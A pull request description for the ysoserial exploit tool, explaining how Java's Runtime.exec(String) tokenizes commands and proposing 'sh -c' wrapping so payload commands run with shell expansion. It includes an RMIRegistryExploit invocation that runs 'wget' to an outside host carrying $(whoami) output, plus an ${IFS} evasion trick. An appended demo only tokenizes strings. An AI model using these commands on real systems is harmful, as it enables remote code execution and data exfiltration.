change Runtime exec(String) to exec(String[]) #60
Java's Runtime.getRuntime().exec(String cmd) is not a shell environment. It cannot use a cmd like "echo $(whoami)" in which $(whoami) would be executed.

Runtime.getRuntime().exec("echo $(whoami)");

will print out: $(whoami)
but not: root

But we could make the String cmd run in a shell environment like this:

String[] cmd_arr = {"sh", "-c", "echo $(whoami)"};
Runtime.getRuntime().exec(cmd_arr);

will print out: root

Or we could make the StringTokenizer that Runtime.getRuntime().exec uses to parse String cmd work appropriately, with a slightly ugly cmd like this:

Runtime.getRuntime().exec("bash -c echo${IFS}$(whoami)");

will print out: root

So I changed execArgs and the exec parameters to put String command into a shell environment. After doing this, users could use

java -cp ysoserial-0.0.4-all.jar ysoserial.exploit.RMIRegistryExploit myhost 1099 CommonsCollections6 'wget selfhost.com/?$(whoami)'

instead of

java -cp ysoserial-0.0.4-all.jar ysoserial.exploit.RMIRegistryExploit myhost 1099 CommonsCollections6 'bash -c wget${IFS}selfhost.com/?$(whoami)'
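
The tokenization described above, as an added illustration that is not part of this pull request or of ysoserial's code: it reproduces the `new StringTokenizer(command)` split that Runtime.exec(String) is documented to perform and prints the resulting argv for the command strings in the description, without executing anything. The class name, the helper names and the constructed third sample string are assumptions made for the example.

```java
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;
import java.util.StringTokenizer;

public class ExecTokenizeDemo {

    // Runtime.exec(String) splits the command with new StringTokenizer(command):
    // whitespace only, no quoting, no expansion. The tokens become argv.
    static String[] tokenize(String command) {
        StringTokenizer st = new StringTokenizer(command);
        List<String> argv = new ArrayList<>();
        while (st.hasMoreTokens()) {
            argv.add(st.nextToken());
        }
        return argv.toArray(new String[0]);
    }

    // If argv is "<shell> -c <script> ...", the shell parses only argv[2];
    // anything after it becomes $0, $1, ... Returns null when no shell is involved.
    static String shellScript(String[] argv) {
        List<String> shells = Arrays.asList("sh", "bash", "/bin/sh", "/bin/bash");
        if (argv.length >= 3 && shells.contains(argv[0]) && "-c".equals(argv[1])) {
            return argv[2];
        }
        return null;
    }

    static void report(String label, String[] argv) {
        String script = shellScript(argv);
        System.out.println(label);
        System.out.println("  argv   = " + Arrays.toString(argv));
        System.out.println("  script = " + (script == null ? "(none, no shell parses this)" : script));
    }

    public static void main(String[] args) {
        // Nothing is executed here; the strings are only tokenized and printed.
        report("exec(String): echo $(whoami)", tokenize("echo $(whoami)"));
        report("exec(String): bash -c echo${IFS}$(whoami)", tokenize("bash -c echo${IFS}$(whoami)"));
        // Constructed sample: the space splits the script, so the shell receives only "echo".
        report("exec(String): sh -c echo $(whoami)", tokenize("sh -c echo $(whoami)"));
        report("exec(String[]): {sh, -c, echo $(whoami)}", new String[] {"sh", "-c", "echo $(whoami)"});
    }
}
```

In code review the same check applies in reverse: a call whose argv begins with a shell and -c hands argv[2] to a shell parser, so untrusted data concatenated into that element is subject to expansion, while exec(String) and a plain exec(String[]) pass metacharacters through as literal bytes.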